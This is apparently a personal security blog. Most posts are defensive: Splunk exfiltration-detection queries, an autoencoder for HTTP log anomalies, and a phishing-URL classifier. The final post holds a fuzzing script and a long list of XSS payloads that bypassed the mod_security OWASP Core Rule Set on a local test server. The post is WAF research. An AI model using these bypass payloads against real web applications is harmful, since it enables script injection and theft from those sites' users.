Index

2/19/2019: Splunk Queries for Identifying Data Exfiltration

1/1/2019: AI: Autoencoder for HTTP Log Anomaly Detection

12/2/2018: AI: Deep Learning for Phishing URL Detection

9/1/2018: Mod_security Bypass for XSS

8/11/2018: AI: FOMC Monetary Policy Analysis v2

7/31/2018: AI: FOMC Monetary Policy Analysis v1

Splunk Queries for Identifying Data Exfiltration

I've been working with Splunk at my job and wanted to share some interesting queries that might assist with network data analytics for cyber security purposes. These queries specifically target behaviors that could indicate data exfiltration. They can be modified for any time frame, but I've been running them against data from the last 30 days. These are massive searches, and with the current limits on my allotted hard disk space, I'm thinking about lowering the time frame to two or three weeks. You can also use the "table" search command to specify what you'd like to see as output; for each query, I have included the output I like to see.

Users with a Large Increase in Web Traffic Moving out of the Network. The query below will output the user, the time, the source IP, the aggregated bytes sent out, the number of data samples, the number of standard deviations away from the source's average bytes sent per day, and the number of standard deviations away from the organization's average bytes sent per day. It will produce output when the bytes out for the latest day are more than 3 standard deviations above the source's or the organization's average over the last 30 days.

((tag=network tag=communicate) OR (index=pan_logs sourcetype=pan*traffic) OR (index=* sourcetype=opsec) OR (index=* sourcetype=cisco:asa) ) (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) AND action=allowed AND (dest_port=80 OR dest_port=443) NOT (dest_ip=10.0.0.0/8 OR dest_ip=172.16.0.0/12 OR dest_ip=192.168.0.0/16)
| bucket _time span=1d
| stats sum(bytes*) as bytes* by user _time src_ip
| eventstats max(_time) as maxtime avg(bytes_out) as avg_bytes_out stdev(bytes_out) as stdev_bytes_out | eventstats count as num_data_samples avg(eval(if(_time < relative_time(maxtime, "@h"),bytes_out,null))) as per_source_avg_bytes_out stdev(eval(if(_time < relative_time(maxtime, "@h"),bytes_out,null))) as per_source_stdev_bytes_out by src_ip  
| where num_data_samples >=4 AND bytes_out > avg_bytes_out + 3 * stdev_bytes_out AND bytes_out > per_source_avg_bytes_out + 3 * per_source_stdev_bytes_out AND _time >= relative_time(maxtime, "@h")
| eval num_standard_deviations_away_from_org_average = round(abs(bytes_out - avg_bytes_out) / stdev_bytes_out,2), num_standard_deviations_away_from_per_source_average = round(abs(bytes_out - per_source_avg_bytes_out) / per_source_stdev_bytes_out,2)
| fields - maxtime per_source* avg* stdev*
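The per-source outlier test in this query boils down to a z-score on daily byte totals. A minimal standalone sketch of the same arithmetic in Python, with made-up daily totals (an illustration of the logic, not part of the Splunk search):

```python
from statistics import mean, stdev

# Hypothetical daily bytes_out totals for one source over 8 days;
# the final day is the one being tested against the baseline.
daily_bytes_out = [1.2e9, 0.9e9, 1.1e9, 1.0e9, 1.3e9, 0.8e9, 1.1e9, 9.5e9]

baseline, latest = daily_bytes_out[:-1], daily_bytes_out[-1]
avg, sd = mean(baseline), stdev(baseline)

# Flag the latest day when it sits more than 3 standard deviations
# above the source's own average, mirroring the query's where clause.
is_outlier = len(baseline) >= 4 and latest > avg + 3 * sd
deviations = round(abs(latest - avg) / sd, 2)
```

The query applies the same test twice, once against the per-source baseline and once against the organization-wide baseline.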

Users with a Sudden Increase in Sending Many DNS Requests. The query below will output the user, the time, the source IP, the destination IP, the number of DNS requests, the number of data samples, the number of standard deviations away from the source's average DNS requests per day, and the number of standard deviations away from the organization's average DNS requests per day. It will produce output when the number of DNS requests for the latest day is more than 3 standard deviations above the source's or the organization's average over the last 30 days.

index=* dest_port=53
| bucket _time span=1d
| stats count by user _time src_ip dest_ip
| eventstats max(_time) as maxtime avg(count) as avg_count stdev(count) as stdev_count | eventstats count as num_data_samples avg(eval(if(_time < relative_time(maxtime, "@h"),count,null))) as per_source_avg_count stdev(eval(if(_time < relative_time(maxtime, "@h"),count,null))) as per_source_stdev_count by src_ip  
| where num_data_samples >=4 AND count > avg_count + 3 * stdev_count AND count > per_source_avg_count + 3 * per_source_stdev_count AND _time >= relative_time(maxtime, "@h")
| eval num_standard_deviations_away_from_org_average = round(abs(count - avg_count) / stdev_count,2), num_standard_deviations_away_from_per_source_average = round(abs(count - per_source_avg_count) / per_source_stdev_count,2)
| fields - maxtime per_source* avg* stdev*

Users with a Sudden Increase in Non-Corporate Emails Sent. The query below will output the email sender, the count of emails sent within the last day, the per-day average emails sent over the last 30 days, and the lower and upper bounds at six standard deviations from that average (note the stdev*6 multiplier in the eval). The results will populate when the count falls outside those bounds.

(index=* sourcetype=cisco:esa* OR sourcetype=MSExchange*:MessageTracking OR tag=email) cef_signature=Message (from=*include_part_of_email_domain_here*) AND (from!=*Brocade* AND from!=*Storage_Alerts*) NOT (to=*include_part_of_email_domain_here*)
| bucket _time span=1d
| stats count by from, _time
| eval maxtime=now() | stats count as num_data_samples max(eval(if(_time >= relative_time(maxtime, "-1d@h"), 'count',null))) as "count" avg(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as avg stdev(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as stdev by "from"
| eval lowerBound=(avg-stdev*6), upperBound=(avg+stdev*6)
| eval isOutlier=if(('count' < lowerBound OR 'count' > upperBound) AND num_data_samples >=7, 1, 0) | where isOutlier=1 AND count>10 AND count>upperBound | table from, num_data_samples, count, avg, stdev, upperBound
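The outlier bounds in this search are just the mean plus or minus six sample standard deviations. A quick Python sketch of that test with hypothetical per-day counts (illustrative numbers, not real data):

```python
from statistics import mean, stdev

# Hypothetical per-day outbound email counts for one sender over the
# baseline window, plus the latest day's count.
history = [12, 15, 11, 14, 13, 12, 16]
latest_count = 95

avg, sd = mean(history), stdev(history)
lower_bound, upper_bound = avg - sd * 6, avg + sd * 6

# Mirrors the query's outlier test: enough samples, count outside the
# six-sigma band, above a floor of 10, and above the upper bound.
is_outlier = (len(history) >= 7
              and (latest_count < lower_bound or latest_count > upper_bound)
              and latest_count > 10
              and latest_count > upper_bound)
```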

Users Suddenly Sending Excessive Email. The query below will output the email sender, the count of emails sent within the last day, the per-day average emails sent over the last 30 days, and the lower and upper bounds at six standard deviations from that average (again via the stdev*6 multiplier). Unlike the previous query, this one counts all mail from corporate senders regardless of recipient. The results will populate when the count falls outside those bounds.

(index=* sourcetype=cisco:esa* OR sourcetype=MSExchange*:MessageTracking OR tag=email) cef_signature=Message (from=*include_part_of_email_domain_here*)
| bucket _time span=1d
| stats count by from, _time
| eval maxtime=now() | stats count as num_data_samples max(eval(if(_time >= relative_time(maxtime, "-1d@h"), 'count',null))) as "count" avg(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as avg stdev(eval(if(_time<relative_time(maxtime,"-1d@h"),'count',null))) as stdev by "from"
| eval lowerBound=(avg-stdev*6), upperBound=(avg+stdev*6)
| eval isOutlier=if(('count' < lowerBound OR 'count' > upperBound) AND num_data_samples >=7, 1, 0) | where isOutlier=1 AND count>10 AND count>upperBound | table from, num_data_samples, count, avg, stdev, upperBound

AI: Autoencoder for HTTP Log Anomaly Detection

For this particular project, I wanted to focus on anomaly detection in the domain of cyber security. I figured that analysis of web logs for anomalies would be a great start to this experiment. After doing some research, it seemed that unsupervised deep learning would be a great way to implement this type of analysis. An autoencoder neural network is a very popular way to detect anomalies in data. The autoencoder tries to learn an approximation to the identity function, reconstructing its input at its output:

h(x) ≈ x

Anomalous inputs don't fit the patterns the network has learned, so they reconstruct poorly and stand out with a high reconstruction error.

Here is what a typical autoencoder model might look like:

Autoencoder model

For detailed information on these models, there are plenty of blogs, research, etc. for the curious mind.
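Before log rows can be fed to an autoencoder, the categorical fields have to become numbers. A minimal sketch of one plausible encoding, assigning an integer id per distinct value in each column (the rows and column layout here are made up for illustration, not the repo's actual preprocessing):

```python
# Toy log rows: (IP, request line, status code).
rows = [
    ("10.130.2.1", "GET /login.php HTTP/1.1", "200"),
    ("10.130.2.1", "GET /home.php HTTP/1.1", "200"),
    ("10.4.5.2",   "GET /madeup.php HTTP/1.1", "404"),
]

# Build one vocabulary per column, mapping each distinct value to an id.
vocabs = [{} for _ in range(3)]
encoded = []
for row in rows:
    vec = []
    for col, value in enumerate(row):
        vec.append(vocabs[col].setdefault(value, len(vocabs[col])))
    encoded.append(vec)
```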

As I needed comprehensive data, I looked for a database of web logs that could easily be run through my autoencoder model. I found a dataset at Kaggle: https://www.kaggle.com/shawon10/web-log-dataset#webLog.csv . This dataset is a 10787 x 4 matrix. The 4 columns represent the IP address, the time, the directory requested, and the HTTP response code. I removed the time column from my data because every one of those entries would be unique and would not help elicit a pattern within the data for anomaly detection. Here are some charts from the output of the model:

Statistics on the Reconstruction Errors: Reconstruction error statistics

Binning of the Reconstruction Errors: Reconstruction error binning

Plotting of the Reconstruction Errors vs. the data: Reconstruction error vs. data

The first bubble in the upper left part of the latest chart is a non-patterned data point that I purposely included to verify the model is working correctly. As you can see, it does indeed stand out. I created a pipeline to extract all original data entries whose mean squared error (reconstruction error) is above the 99th percentile. This is the threshold that I used to automatically detect anomalies. Samples of the data above the threshold can be seen below; all of the data points above the threshold are available on Github as a separate text file. You can verify yourself that these directories are unique in the original dataset. It is incredible that this AI was able to figure out which values are anomalies based on some hyperparameters and the training of the model on this data.

200
GET /madeup.php HTTP/1.1
10.4.5.2
----------------------------------
GET /profile.php?user=bala HTTP/1.1
10.130.2.1
200
----------------------------------
GET /edit.php?name=bala HTTP/1.1
10.131.2.1
200
----------------------------------
10.131.2.1
200
GET /contestproblem.php?name=Toph%20Contest%202 HTTP/1.1
----------------------------------
10.131.2.1
GET /details.php?id=3 HTTP/1.1
200
----------------------------------
10.131.2.1
200
GET /contestsubmission.php?id=4 HTTP/1.1
----------------------------------
10.131.2.1
200
GET /edit.php?name=ksrsingh HTTP/1.1
----------------------------------
200
GET /showcode.php?id=285&nm=ksrsingh HTTP/1.1
10.131.0.1
----------------------------------
GET /allsubmission.php?name=shawon HTTP/1.1
200
10.128.2.1
----------------------------------
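The 99th-percentile cutoff described above can be sketched in a few lines of Python (the error values here are made up; the real pipeline is in the repo):

```python
# Flag rows whose reconstruction error exceeds the 99th percentile.
# Made-up errors: a smooth ramp plus one obvious outlier at the end.
errors = [0.01 * i for i in range(100)] + [5.0]

ranked = sorted(errors)
# Integer arithmetic for the percentile index avoids float surprises.
threshold = ranked[99 * (len(ranked) - 1) // 100]
anomalies = [i for i, e in enumerate(errors) if e > threshold]
```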

If there are issues with accessing my Github repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my Github for code, model, and the dataset related to this project.

I've also included my output from Keras below:

Found 271 unique tokens.
_________________________________________________________________
Layer (type)                 Output Shape              Param #
=================================================================
input_4 (InputLayer)         (None, 3)                 0
_________________________________________________________________
dense_13 (Dense)             (None, 2)                 8
_________________________________________________________________
dense_14 (Dense)             (None, 1)                 3
_________________________________________________________________
dense_15 (Dense)             (None, 2)                 4
_________________________________________________________________
dense_16 (Dense)             (None, 3)                 9
=================================================================
Total params: 24
Trainable params: 24
Non-trainable params: 0
_________________________________________________________________
Train on 8630 samples, validate on 2157 samples
Epoch 1/50
8630/8630 [==============================] - 1s 77us/step - loss: 544.2785 - acc: 0.3645 - val_loss: 250.2417 - val_acc: 0.0000e+00
Epoch 2/50
8630/8630 [==============================] - 1s 58us/step - loss: 542.9074 - acc: 0.8287 - val_loss: 249.4843 - val_acc: 0.0000e+00
Epoch 3/50
8630/8630 [==============================] - 0s 56us/step - loss: 541.6439 - acc: 0.1955 - val_loss: 248.8086 - val_acc: 0.0000e+00
Epoch 4/50
8630/8630 [==============================] - 0s 56us/step - loss: 540.5283 - acc: 0.5802 - val_loss: 248.2224 - val_acc: 0.0000e+00
Epoch 5/50
8630/8630 [==============================] - 0s 57us/step - loss: 539.5738 - acc: 0.9196 - val_loss: 247.7275 - val_acc: 0.9986
Epoch 6/50
8630/8630 [==============================] - 0s 58us/step - loss: 538.7705 - acc: 0.9461 - val_loss: 247.3153 - val_acc: 0.9986
Epoch 7/50
8630/8630 [==============================] - 0s 56us/step - loss: 538.1015 - acc: 0.9461 - val_loss: 246.9732 - val_acc: 0.9986
Epoch 8/50
8630/8630 [==============================] - 0s 57us/step - loss: 537.5472 - acc: 0.9461 - val_loss: 246.6904 - val_acc: 0.9986
Epoch 9/50
8630/8630 [==============================] - 0s 57us/step - loss: 537.0872 - acc: 0.9461 - val_loss: 246.4559 - val_acc: 0.9986
.................................................................
Epoch 45/50
8630/8630 [==============================] - 0s 57us/step - loss: 534.4239 - acc: 0.9461 - val_loss: 245.0778 - val_acc: 0.9986
Epoch 46/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4204 - acc: 0.9461 - val_loss: 245.0758 - val_acc: 0.9986
Epoch 47/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4172 - acc: 0.9461 - val_loss: 245.0742 - val_acc: 0.9986
Epoch 48/50
8630/8630 [==============================] - 0s 57us/step - loss: 534.4143 - acc: 0.9461 - val_loss: 245.0727 - val_acc: 0.9986
Epoch 49/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4117 - acc: 0.9461 - val_loss: 245.0713 - val_acc: 0.9986
Epoch 50/50
8630/8630 [==============================] - 0s 56us/step - loss: 534.4094 - acc: 0.9461 - val_loss: 245.0701 - val_acc: 0.9986

AI: Deep Learning for Phishing URL Detection

I wanted to continue building my A.I. / deep learning knowledge. A requirement for this project was that it had to be focused on cyber security. I know that email-based phishing is a big issue within our society, and I wanted to focus my efforts in that particular direction. I have somewhat of a specialization in applying deep learning to NLP (natural language processing); this is simply an observation of my interests and resulting output.

I decided to use binary classification for this particular model; thus I had to find phishing URLs.

For the phishing URLs, I used Phishtank's verified URL database. I have coded logic that polls their API every 4 hours and continues to build a local database. For my non-phishing URLs, I have a crawler I found on Github and modified for my own purposes to update a local database.

I went with a character-embedded Bidirectional LSTM for training. This seems to be a production-worthy, state-of-the-art model that benefits from seeing both earlier characters and characters later in the URL, which helps it identify features useful for binary classification. At the end of this post I have included the Keras training output.
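Character embedding starts with mapping each character of the URL to an integer id and padding to a fixed length; the training output below shows 69 unique tokens and an input length of 128. A minimal sketch of that step (the id-assignment scheme here is illustrative, not the repo's actual tokenizer):

```python
MAXLEN = 128  # fixed sequence length, matching the model's input shape

def encode_url(url, char_index, maxlen=MAXLEN):
    # Assign each previously unseen character the next free id (0 is
    # reserved for padding), then truncate/right-pad to maxlen.
    ids = [char_index.setdefault(c, len(char_index) + 1) for c in url]
    ids = ids[:maxlen]
    return ids + [0] * (maxlen - len(ids))

char_index = {}
seq = encode_url("http://example.com/login", char_index)
```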

Below are charts of the training/cross-validation loss and accuracy:

Training/val loss Training/val acc

The model achieved 97.68% accuracy on the test set (representing 10% of the URLs, i.e. 6799 URLs). I have also included evaluation metrics below for this model: the ROC/AUC curve, confusion matrices, and the F1 score.

ROC/AUC Curve:

ROC/AUC Curve ROC/AUC Curve Zoomed

Confusion matrices:

Confusion Matrix non-normalized Confusion Matrix normalized

F1 Score:

F1 Score
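The F1 score is the harmonic mean of precision and recall, both of which come straight from the confusion-matrix counts. A quick worked example (the counts below are hypothetical, not this model's actual results):

```python
# Hypothetical confusion-matrix counts: true positives, false
# positives, false negatives.
tp, fp, fn = 3300, 80, 76

precision = tp / (tp + fp)   # of everything flagged phishing, how much was right
recall = tp / (tp + fn)      # of all real phishing, how much was caught
f1 = 2 * precision * recall / (precision + recall)
```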

For various directories and files, I seem to get a respectable level of accuracy on unseen data. However, various tests show unreliable predictions when it comes to base URLs, so I have code that simply returns no prediction for base URLs, e.g. https://www.zpettry.com.

I have put together a Flask REST API that can be tested locally. I also have a "request.py" program available that will do the POST request for you. All you have to do is add the URL of your choice.

Future Plans:

I have coded logic that continuously acquires both phishing and regular URLs, as I'm thinking about turning this model into more of an anomaly detection paradigm by using an autoencoder. There is a plethora of regular URLs to train on, since the data is incredibly asymmetric (benign URLs vastly outnumber phishing ones). Furthermore, I might start looking into the bodies of emails and train an anomaly detection model to classify whether a message is phishing. This way I can create an ensemble model; based on my research, ensemble models tend to outperform non-ensemble methods.

If there are issues with accessing my Github repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my Github for code and datasets related to this project.

Because of Github size limits, the model can be downloaded here: Model

This is the training output from Keras:

Using TensorFlow backend.
Found 69 unique tokens.
Shape of data tensor: (67997, 128)
Shape of label tensor: (67997,)
_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
embedding_4 (Embedding)      (None, 128, 128)          8960      
_________________________________________________________________
bidirectional_10 (Bidirectio (None, 128, 512)          788480    
_________________________________________________________________
bidirectional_11 (Bidirectio (None, 128, 512)          1574912   
_________________________________________________________________
bidirectional_12 (Bidirectio (None, 256)               656384    
_________________________________________________________________
dense_4 (Dense)              (None, 1)                 257       
=================================================================
Total params: 3,028,993
Trainable params: 3,028,993
Non-trainable params: 0
_________________________________________________________________
Train on 48957 samples, validate on 12240 samples
Epoch 1/10
48957/48957 [==============================] - 1082s 22ms/step - loss: 0.4997 - acc: 0.7468 - val_loss: 0.3786 - val_acc: 0.8386
Epoch 2/10
48957/48957 [==============================] - 1078s 22ms/step - loss: 0.3326 - acc: 0.8631 - val_loss: 0.2266 - val_acc: 0.9182
Epoch 3/10
48957/48957 [==============================] - 1079s 22ms/step - loss: 0.2686 - acc: 0.8942 - val_loss: 0.1943 - val_acc: 0.9252
Epoch 4/10
48957/48957 [==============================] - 1081s 22ms/step - loss: 0.1852 - acc: 0.9326 - val_loss: 0.1308 - val_acc: 0.9551
Epoch 5/10
48957/48957 [==============================] - 1080s 22ms/step - loss: 0.1664 - acc: 0.9400 - val_loss: 0.1272 - val_acc: 0.9574
Epoch 6/10
48957/48957 [==============================] - 1081s 22ms/step - loss: 0.1274 - acc: 0.9561 - val_loss: 0.0995 - val_acc: 0.9683
Epoch 7/10
48957/48957 [==============================] - 1081s 22ms/step - loss: 0.1006 - acc: 0.9661 - val_loss: 0.0844 - val_acc: 0.9742
Epoch 8/10
48957/48957 [==============================] - 1079s 22ms/step - loss: 0.0894 - acc: 0.9702 - val_loss: 0.0674 - val_acc: 0.9772
Epoch 9/10
48957/48957 [==============================] - 1078s 22ms/step - loss: 0.0839 - acc: 0.9732 - val_loss: 0.0658 - val_acc: 0.9800
Epoch 10/10
48957/48957 [==============================] - 1079s 22ms/step - loss: 0.0717 - acc: 0.9769 - val_loss: 0.0582 - val_acc: 0.9825
6799/6799 [==============================] - 46s 7ms/step
Model Accuracy: 98.29%

Mod_security Bypass for XSS

I wanted to do some research in the cyber security domain that piqued my interest. I decided to test which XSS strings in the FuzzDB and SecLists lists bypassed the mod_security OWASP Core Rule Set on a standard Apache2 web server. I used the code below:

#!/usr/bin/env python
"""
Test for mod_security bypass.
"""
# Third-party libraries.
import requests

URL = 'http://127.0.0.1/login2.php'

with open('/root/projects/fuzzdb.txt') as f:
    payloads = f.read().splitlines()

# Map each payload to the HTTP status code the server returned.
results = {}
for payload in payloads:
    data = {'username': payload, 'password': '1'}
    r = requests.post(URL, data=data)
    results[payload] = r.status_code

# A 200 means the WAF did not block the request; a 403 means it did.
for payload, status in results.items():
    if status == 200:
        print(payload)
        print('----------------------------------------------')

I combined all the separate XSS lists within FuzzDB as well as SecLists, then ran them against the login parameter of a quick PHP login script I acquired for testing. As you can see from the preceding Python code, I print out each string that received a 200 response code from the Apache2 server. A 200 means the string is not being filtered by the WAF; a filtered request would instead receive a 403 Forbidden response from the server.
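The status codes collected by the test loop can also be tallied to get a rough bypass rate. A small sketch (the status codes here are made-up sample values, not my actual run):

```python
from collections import Counter

# Hypothetical status codes collected by the test loop: the tally
# shows how many payloads the WAF blocked (403) vs. passed (200).
status_codes = [403, 403, 200, 403, 200, 403, 403]

tally = Counter(status_codes)
bypass_rate = tally[200] / len(status_codes)
```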

If there are issues with accessing my Github repo below, I have a zipped file with my code and datasets here: Repo Copy

Please see my Github for all code related to this project.

These are the XSS strings that were allowed to pass through the mod_security WAF:

'
----------------------------------------------
"
----------------------------------------------
&#x61;l&#x65;rt&#40;1)
----------------------------------------------
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
----------------------------------------------
&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
----------------------------------------------
'); alert('XSS
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
alert
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert(1)
----------------------------------------------
alert\\`1\\`
----------------------------------------------
alert`1`
----------------------------------------------
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
----------------------------------------------
//%0D%0A%0D%0A//
----------------------------------------------
setTimeout(location.search.slice(1));
----------------------------------------------
\'-alert(1)//
----------------------------------------------
<br><br><br><br><br><br><br><br><br><br>
----------------------------------------------
<br><br><br><br><br><br><x id=x>#x
----------------------------------------------
alert`1`
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert&#x28;1&#x29
----------------------------------------------
alert&#40;1&#41
----------------------------------------------
(alert)(1)
----------------------------------------------
a=alert,a(1)
----------------------------------------------
[1].find(alert)
----------------------------------------------
top["al"+"ert"](1)
----------------------------------------------
top[/al/.source+/ert/.source](1)
----------------------------------------------
al\u0065rt(1)
----------------------------------------------
top['al\145rt'](1)
----------------------------------------------
top['al\x65rt'](1)
----------------------------------------------
top[8680439..toString(30)](1)
----------------------------------------------
navigator.vibrate(500)
----------------------------------------------
# credit to rsnake
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
>>> vectors()
----------------------------------------------
<head>
----------------------------------------------
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
----------------------------------------------
</head>
----------------------------------------------
<body>Hello</body>
----------------------------------------------
 onerror CDATA "alert(67)"
----------------------------------------------
 onload CDATA "alert(2)">
----------------------------------------------
<div id="91">[A]
----------------------------------------------
[B]
----------------------------------------------
[C]
----------------------------------------------
[D]
----------------------------------------------
<feImage>
----------------------------------------------
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
----------------------------------------------
</feImage>
----------------------------------------------
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
----------------------------------------------
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
----------------------------------------------
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
----------------------------------------------
<div id="113"><div id="x">XXX</div>
----------------------------------------------
#x{font-family:foo[bar;color:green;}
----------------------------------------------
#y];color:red;{}
----------------------------------------------
<div id="116"><div id="x">x</div>
----------------------------------------------
<xml:namespace prefix="t">
----------------------------------------------
<div id="117"><a href="http://attacker.org">
----------------------------------------------
    <h1>Drop me</h1>
----------------------------------------------
</div>
----------------------------------------------
function makePopups(){
----------------------------------------------
    for (i=1;i<6;i++) {
----------------------------------------------
        window.open('popup.html','spam'+i,'width=50,height=50');
----------------------------------------------
    }
----------------------------------------------
}
----------------------------------------------
<body>
----------------------------------------------
</body>
----------------------------------------------
<div id="123"><span class=foo>Some text</span>
----------------------------------------------
<a class=bar href="http://www.example.org">www.example.org</a>
----------------------------------------------
alert('foo');
----------------------------------------------
});
----------------------------------------------
alert('bar');
----------------------------------------------
<!ATTLIST xsl:stylesheet
----------------------------------------------
  id    ID    #REQUIRED>]>
----------------------------------------------
        </xsl:template>
----------------------------------------------
    <circle fill="red" r="40"></circle>
----------------------------------------------
Same effect with
----------------------------------------------
<math>
----------------------------------------------
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
----------------------------------------------
<br/><hr/>
----------------------------------------------
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
----------------------------------------------
<br>
----------------------------------------------
<input name="secret" type="password">
----------------------------------------------
</image>
----------------------------------------------
<div id="134"><xmp>
----------------------------------------------
<%
----------------------------------------------
</xmp>
----------------------------------------------
x='<%'
----------------------------------------------
alert(2)
----------------------------------------------
XXX
----------------------------------------------
<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
----------------------------------------------
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
----------------------------------------------
</template>
----------------------------------------------
<input name="username" value="admin" />
----------------------------------------------
<input name="password" type="password" value="secret" />
----------------------------------------------
<input name="injected" value="injected" dirname="password" />
----------------------------------------------
<input type="submit">
----------------------------------------------
<circle r="400"></circle>
----------------------------------------------